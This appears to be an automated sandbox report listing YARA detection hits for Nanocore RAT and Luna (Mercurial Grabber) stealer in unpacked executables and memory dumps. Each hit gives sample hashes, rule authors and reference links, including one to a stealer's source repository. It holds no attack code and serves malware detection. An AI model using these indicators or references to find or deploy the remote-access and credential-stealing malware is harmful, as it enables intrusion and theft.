Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
